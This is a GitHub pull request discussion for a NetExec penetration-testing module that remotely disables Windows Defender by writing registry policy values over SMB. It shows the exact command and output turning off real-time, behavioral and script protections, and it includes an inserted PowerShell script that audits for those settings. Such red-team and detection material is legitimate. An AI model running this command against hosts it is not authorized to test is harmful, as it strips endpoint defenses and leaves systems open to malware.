
Defender control module proposal #66

Open · wants to merge 9 commits into main

Conversation

byinarie

This PoC module enables or disables Windows Defender via the registry over SMB; additional functionality would also include things like adding/removing exclusions, definitions, starting/stopping the service and so on.

Only submitting a PR with the MVP to get community feedback and thoughts on having this module be included in NetExec.

poetry run NetExec smb 10.10.100.45 -u Administrator -p 'P@ssw0rd!' -M defender -o ACTION=disable

[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB         10.10.100.45    445    DESKTOP-07QF5CJ  [*] Windows 10.0 Build 19041 x64 (name:DESKTOP-07QF5CJ) (domain:DESKTOP-07QF5CJ) (signing:False) (SMBv1:False)
SMB         10.10.100.45    445    DESKTOP-07QF5CJ  [+] DESKTOP-07QF5CJ\Administrator:P@ssw0rd! (Pwn3d!)
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified PUAProtection to 0 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified ServiceKeepAlive to 0 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableRoutinelyTakingAction to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableAntiSpyware to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableAntiVirus to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified RealtimeScanDirection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified IOAVMaxSize to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableScanOnRealtimeEnable to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableRealtimeMonitoring to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableOnAccessProtection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableIOAVProtection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableBehaviorMonitoring to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableScriptScanning to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableIntrusionPreventionSystem to 1 via SMB


Reference Registry keys: https://admx.help/HKLM/Software/Policies/Microsoft/Windows%20Defender
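For the defending side of this change, a read-only audit added here as an example (not part of the PR or of NetExec): it walks the policy root from the ADMX reference above and reports every value from the output that is present in the state the module writes for ACTION=disable. It assumes only the policy root path from that reference and locates each value by recursion rather than assuming which subkey it lives in.

```powershell
# Added example, not NetExec code: report Defender policy values left in the
# disabled state shown in the PR output. Read-only; run as an administrator.
# Assumed: the policy root from the ADMX reference linked in the PR.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

# Value name -> data the module writes for ACTION=disable (taken from the PR output).
$DisabledState = @{
    PUAProtection                    = 0
    ServiceKeepAlive                 = 0
    DisableRoutinelyTakingAction     = 1
    DisableAntiSpyware               = 1
    DisableAntiVirus                 = 1
    RealtimeScanDirection            = 1
    IOAVMaxSize                      = 1
    DisableScanOnRealtimeEnable      = 1
    DisableRealtimeMonitoring        = 1
    DisableOnAccessProtection        = 1
    DisableIOAVProtection            = 1
    DisableBehaviorMonitoring        = 1
    DisableScriptScanning            = 1
    DisableIntrusionPreventionSystem = 1
}

function Get-DefenderPolicyTamper {
    # No policy key at all means nothing is being forced off by policy on this host.
    if (-not (Test-Path $PolicyRoot)) { return @() }

    # The root key plus every subkey beneath it, so values are found wherever they sit.
    $keys = @(Get-Item $PolicyRoot) + @(Get-ChildItem $PolicyRoot -Recurse)
    $findings = foreach ($key in $keys) {
        foreach ($name in $DisabledState.Keys) {
            # A missing value raises a non-terminating error; treat it as "not set".
            $prop = Get-ItemProperty -Path $key.PSPath -Name $name -ErrorAction SilentlyContinue
            if ($null -ne $prop -and $prop.$name -eq $DisabledState[$name]) {
                [pscustomobject]@{ Key = $key.Name; Value = $name; Data = $prop.$name }
            }
        }
    }
    return @($findings)
}

$hits = Get-DefenderPolicyTamper
if ($hits.Count -eq 0) {
    Write-Output 'No Defender policy values match the module disabled state.'
} else {
    $hits | Format-Table -AutoSize
    # Cross-check the live engine state as Defender itself reports it.
    Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled, BehaviorMonitorEnabled
}
```

Any hit here is a policy setting that an administrator did not intend, or a trace of exactly the write shown above; the remote registry write itself also arrives over SMB as an authenticated admin session, which is the event to correlate on.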

Defender Control module proposal. This is a PoC to disable Defender via registry keys over SMB. Additional functionality would also include starting and stopping the service, adding/removing exclusions, updating/removing signatures, etc.

Signed-off-by: PJ <byinarie@gmail.com>
added enable/disable dictionary

Signed-off-by: PJ <byinarie@gmail.com>
re-add shebang/utf

Signed-off-by: PJ <byinarie@gmail.com>
re-added admx reference

Signed-off-by: PJ <byinarie@gmail.com>
final patch, added --options help

Signed-off-by: PJ <byinarie@gmail.com>
@Marshall-Hallenbeck (Collaborator)

@byinarie I like the module. Instead of outputting every single registry change, could you instead just write one message like "Defender Disabled" or "Defender Enabled" after they are changed successfully, and then do a debug message for each one? I can imagine if you are running this across several hosts it's going to absolutely spam the hell out of your terminal.

@NeffIsBack (Contributor)

Or info message :)

@Marshall-Hallenbeck Marshall-Hallenbeck changed the base branch from main to develop October 12, 2023 20:33
@Marshall-Hallenbeck (Collaborator)

Changed to merged into develop

@byinarie (Author)

> Changed to merged into develop

Working on making the changes suggested here and a few others. Will submit when complete. Appreciate the feedback :)

@bongobongoland (Contributor)

Hi there. Just saw this :)
So with Server OSs, all you need to do is remove WD's definitions. With desktop Windows you need to do much more than that (as shown in your screenshot). So I'm wondering if the best strategy is to check the OS version first and then decide which option is most suitable.

Signed-off-by: Marshall Hallenbeck <Marshall.Hallenbeck@gmail.com>
@NeffIsBack NeffIsBack added this to the v1.2.0 milestone Nov 4, 2023
@Marshall-Hallenbeck Marshall-Hallenbeck changed the base branch from develop to main November 13, 2023 15:18
@byinarie (Author)

Update: been busy with but will be finishing the code soon :)

@Marshall-Hallenbeck Marshall-Hallenbeck removed this from the v1.2.0 milestone Mar 12, 2024
@Marshall-Hallenbeck (Collaborator)

@byinarie any idea on when you'd be able to finish this? If not, what were you going to update? I find myself doing this manually, so I think this would be a great addition and can help out implement whatever you wanted to finish up adding. Let me know.


5 participants